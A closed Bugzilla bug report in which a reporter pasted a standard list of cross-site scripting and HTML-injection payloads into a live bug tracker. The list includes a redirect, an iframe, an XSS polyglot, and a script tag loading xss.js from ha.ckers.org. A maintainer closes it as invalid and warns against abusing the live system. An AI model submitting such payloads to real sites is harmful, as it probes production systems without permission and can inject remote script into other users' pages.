Closed
Bug 772015
Opened 13 years ago
Closed 13 years ago
dsfsdfds
Categories
(Bugzilla :: Creating/Changing Bugs, defect)
Tracking
()
RESOLVED
INVALID
People
(Reporter: eusebiu.blindu, Unassigned)
Details
Attachments
(1 file)
24.30 KB,
text/plain
|
Details |
User Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11
Steps to reproduce:
1)REDIRECT
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.testalways.com">
2)IFRAME
<iframe src="http://www.testalways.com/"></iframe>
3)IMAGE tag
<img src="http://www.testalways.com/utest/hack.gif" />
<img src="http://bit.ly/J9EeDQ" />
4)
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
5)
'';!--"<XSS>=&{()}
6)
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
7)
<IMG SRC="javascript:alert('XSS');">
8)http://ha.ckers.org/xss.html
Actual results:
1)REDIRECT
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.testalways.com">
2)IFRAME
<iframe src="http://www.testalways.com/"></iframe>
3)IMAGE tag
<img src="http://www.testalways.com/utest/hack.gif" />
<img src="http://bit.ly/J9EeDQ" />
4)
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
5)
'';!--"<XSS>=&{()}
6)
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
7)
<IMG SRC="javascript:alert('XSS');">
8)http://ha.ckers.org/xss.html
Expected results:
1)REDIRECT
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.testalways.com">
2)IFRAME
<iframe src="http://www.testalways.com/"></iframe>
3)IMAGE tag
<img src="http://www.testalways.com/utest/hack.gif" />
<img src="http://bit.ly/J9EeDQ" />
4)
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
5)
'';!--"<XSS>=&{()}
6)
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
7)
<IMG SRC="javascript:alert('XSS');">
8)http://ha.ckers.org/xss.html
Please don't create test bugs here, this is a live Bugzilla instance.
Use http://landfill.bugzilla.org/ if you want to test things.
If you continue to abuse the system your account will be locked.
Status: UNCONFIRMED → RESOLVED
Closed: 13 years ago
Resolution: --- → INVALID
You need to log in
before you can comment on or make changes to this bug.
Description
•